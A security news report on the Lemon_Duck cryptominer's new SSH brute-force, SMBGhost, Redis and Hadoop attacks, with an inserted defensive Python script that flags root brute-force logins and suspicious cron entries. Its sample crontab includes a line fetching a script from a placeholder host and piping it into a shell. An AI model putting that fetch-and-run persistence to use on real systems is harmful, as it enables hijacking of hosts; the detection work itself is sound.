The Lemon_Duck cryptomining malware has been upgraded so that it can breach Linux systems (via SSH brute-force attacks), exploit systems vulnerable to the SMBGhost vulnerability, and infect servers running Redis and Hadoop.
Lemon_Duck cryptomining malware, detected last year by Trend Micro and further examined by SentinelOne, usually targets corporate networks, gaining access to the MS SQL service via brute force or to the SMB protocol using the EternalBlue exploit.
Once it successfully infects a device, the malware installs an XMRig Monero (XMR) CPU miner payload that uses the resources of the compromised system to mine cryptocurrency for the Lemon_Duck operators.
Lemon_Duck cryptomining malware searches for Linux systems and cloud applications
To find Linux devices that it can infect through SSH brute-force attacks, Lemon_Duck uses a port scanning module that looks for Internet-connected Linux systems with TCP port 22, used for SSH remote login, exposed.
"When it finds them, an SSH brute-force attack begins on these machines, with the username root and a list of passwords," said Sophos security researcher Rajesh Nataraj. "If the attack is successful, the attackers download and execute malicious code."
To ensure that the malware survives system reboots, a cron job is added.
Lemon_Duck is also able to neutralize other cryptominers that may be installed on the Linux system, to make sure that only its operators can steal cryptocurrency.
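The two Linux-side behaviours described above, a root-targeted SSH brute-force attempt and a cron entry used for persistence, both leave traces a defender can look for. The following is an added example, not code from the article or from Sophos; it scans constructed sshd auth-log lines for bursts of failed root password logins followed by a successful one, and flags crontab entries that pipe a downloader into a shell. The log lines, the crontab text, the IP addresses and the `example.invalid` URL are all constructed sample data, and the failure threshold is an assumed tuning value.

```python
import re
from collections import defaultdict

# Constructed sample sshd log lines (not real data): one source hammers root,
# then gets in with a password; a normal user logs in with a key elsewhere.
SAMPLE_AUTH_LOG = """\
Aug 12 10:01:01 host sshd[2001]: Failed password for root from 203.0.113.7 port 51000 ssh2
Aug 12 10:01:02 host sshd[2002]: Failed password for root from 203.0.113.7 port 51001 ssh2
Aug 12 10:01:03 host sshd[2003]: Failed password for root from 203.0.113.7 port 51002 ssh2
Aug 12 10:01:04 host sshd[2004]: Failed password for root from 203.0.113.7 port 51003 ssh2
Aug 12 10:01:05 host sshd[2005]: Failed password for root from 203.0.113.7 port 51004 ssh2
Aug 12 10:01:06 host sshd[2006]: Accepted password for root from 203.0.113.7 port 51005 ssh2
Aug 12 10:05:00 host sshd[2100]: Failed password for alice from 198.51.100.4 port 40000 ssh2
Aug 12 10:06:00 host sshd[2101]: Accepted publickey for alice from 198.51.100.4 port 40001 ssh2
"""

# Constructed sample crontab (not real data); the URL is a placeholder.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
*/1 * * * * curl -fsSL http://example.invalid/a.sh | sh
"""

FAILED_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port")
ACCEPTED_RE = re.compile(r"sshd\[\d+\]: Accepted (\S+) for (\S+) from (\S+) port")
# Downloader piped straight into a shell, or inline base64 decoding, in a cron command.
SUSPICIOUS_CRON_RE = re.compile(r"(curl|wget)[^|\n]*\|\s*(ba)?sh\b|base64\s+-d")


def find_root_bruteforce(log_text, threshold=5):
    """Map each source IP with at least `threshold` failed root password
    logins to its failure count and whether a password login as root from
    that IP was also accepted (the strongest sign the brute force worked)."""
    failures = defaultdict(int)
    accepted_root = set()
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            user, ip = m.groups()
            if user == "root":
                failures[ip] += 1
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            method, user, ip = m.groups()
            if user == "root" and method == "password":
                accepted_root.add(ip)
    return {
        ip: {"failures": n, "root_password_login_seen": ip in accepted_root}
        for ip, n in failures.items()
        if n >= threshold
    }


def find_suspicious_cron_entries(crontab_text):
    """Return the non-comment crontab lines whose command matches the
    download-and-execute pattern used for persistence."""
    hits = []
    for line in crontab_text.splitlines():
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        if SUSPICIOUS_CRON_RE.search(entry):
            hits.append(entry)
    return hits


if __name__ == "__main__":
    for ip, info in find_root_bruteforce(SAMPLE_AUTH_LOG).items():
        print(f"root brute force from {ip}: {info}")
    for entry in find_suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"suspicious cron entry: {entry}")
```

On a live host the same functions can be fed `/var/log/auth.log` (or `journalctl -u ssh`) and the output of `crontab -l` for root and every other user; disabling password authentication for root in `sshd_config` removes the attack surface the first check watches.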
The Lemon_Duck cryptomining malware upgraded for new attacks
The cryptojacker is also distributed in a large-scale COVID-19-themed spam campaign. The malware uses an RTF exploit targeting the Microsoft Office remote code execution (RCE) vulnerability CVE-2017-8570 to deliver the malicious payload.
Recently, Lemon_Duck's operators added an exploit for the Windows SMBGhost vulnerability (CVE-2020-0796).
However, instead of using this vulnerability to execute the malware, the operators use it to collect information about compromised computers.
For about two months, between June and August, the hackers behind the Lemon_Duck cryptomining malware disabled the EternalBlue and Mimikatz functions, most likely to test the effectiveness of SMBGhost.
After deploying the XMRig miner on compromised devices, the malware tries to disable SMBv3 and block SMB ports 445 and 135 to prevent others from exploiting the infected, vulnerable systems.
In addition, the operators of the Lemon_Duck cryptomining malware have added support for scanning and breaching servers with exposed Redis (REmote DIctionary Server) databases and Hadoop clusters managed with YARN (Yet Another Resource Negotiator).
"Lemon_Duck cryptomining malware is one of the most advanced types of cryptojacker payloads," explained Sophos security researcher Rajesh Nataraj.
"Its creators are constantly updating the code with new techniques to avoid detection, and the miner itself is fileless, which means that it leaves no traces in the victim's file system."